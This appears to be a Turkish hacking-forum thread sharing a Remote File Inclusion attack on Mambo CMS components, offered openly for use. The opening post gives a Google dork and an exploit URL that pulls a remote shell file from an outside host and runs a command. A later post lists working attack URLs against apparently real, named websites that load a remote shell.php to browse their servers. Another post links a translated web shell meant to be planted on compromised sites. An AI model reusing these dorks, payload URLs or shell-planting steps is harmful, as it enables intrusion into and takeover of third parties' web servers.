folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Mambo RFİ Güvenlik Açığı



Mambo RFİ Güvenlik Açığı

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AntiOksidan
    AntiOksidan's avatar
    Kayıt Tarihi: 03/Ekim/2005
    Erkek
    Önce ki dökümanlarımızda RFİ yani Remote File İnlcusion hakkında bilgi verdik....
    şimdi googleda nasıl aratıcaz siteleri şöyle:

    "index.php?option=com_mtree"

    sitenin sonuna yapacağımız ekleme:

    components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_p ath=http://members.lycos.co.uk/liz0zim/shell.txt?&cmd=id

    bu olacak yani

    http://siteadi.com/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_p ath=http://members.lycos.co.uk/liz0zim/shell.txt?&cmd=id



    kolay gelsn
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kokainman
    kokainman's avatar
    Kayıt Tarihi: 22/Ocak/2006
    Erkek
    eyvallah hoca güzel bilgiler.hack sitesiyiz böle şeylere ağırlık verelim topiclerde.siyaset bu konuların önüne geçmesin
    ölümüne hack konuları aq :D

    ... sorcerer & musket ...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MaviBere
    MaviBere's avatar
    Kayıt Tarihi: 04/Nisan/2006
    Erkek
    eyv oksi

    hız emniyettir...!
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    arahman
    arahman's avatar
    Kayıt Tarihi: 29/Temmuz/2005
    Erkek
    zaten :D mambonun rfisi çoğaldı bu aralar :D

    alında bendede size başka açık .

    arama: inurl:"index.php?option=com_cpg"

    www.siteadı.com/components/com_cpg/cpg.php?mosConfig_absolute_path=

    örnek

    http://www.lcjm.cz/components/com_cpg/cpg.php?mosConfig_absolute_path=http%3A%2F%2Fharunrasit89.sitemynet.com%2Fshell.php%3Fcmd&act=ls&d=%2Fsrv4%2Fwww%2Flcjm.cz%2Fsubdomains%2Fwww&sort=0a

    http://www.3d-model-shop.de/mambo/components/com_cpg/cpg.php?mosConfig_absolute_path=http%3A%2F%2Fharunrasit89.sitemynet.com%2Fshell.php%3Fcmd&act=ls&d=%2Fsrv%2Fwww%2Fhtdocs%2Fweb14%2Fhtml%2F&sort=0a

    oksinin verdiğini şeysi :D örnek olarak

    http://www.virtualgainesville.com/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http%3A%2F%2Fharunrasit89.sitemynet.com%2Fshell.php%3Fcmd&act=ls&d=C%3A%5Cwww&sort=0a

    Life's been getting harder, but I'm hanging in there
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    turunc4u
    turunc4u's avatar
    Kayıt Tarihi: 16/Ağustos/2006
    Erkek

    http://rapidshare.de/files/29824847/99.php.html

    AntiOksidanın verdiği güvenlik açığı ile girebileceğiniz yer bir nevi panel ve ingilizce... yukardaki verdiğim ve benim düzenlediğim 99.php dosyasını Savant2 dizininin içine atıyorsunuz ve bir dahaki girişinizi
    http://hedef site/components/com_mtree/Savant2/99.php şeklinde yapıyorsnuz. Artık panel türkçe. Hacke yeni başlayanlar ve ingilizcesi kötü olanlar için güzel bir kaynak. bLuetuLips RuLLz:)

     

     

Toplam Hit: 12168 Toplam Mesaj: 5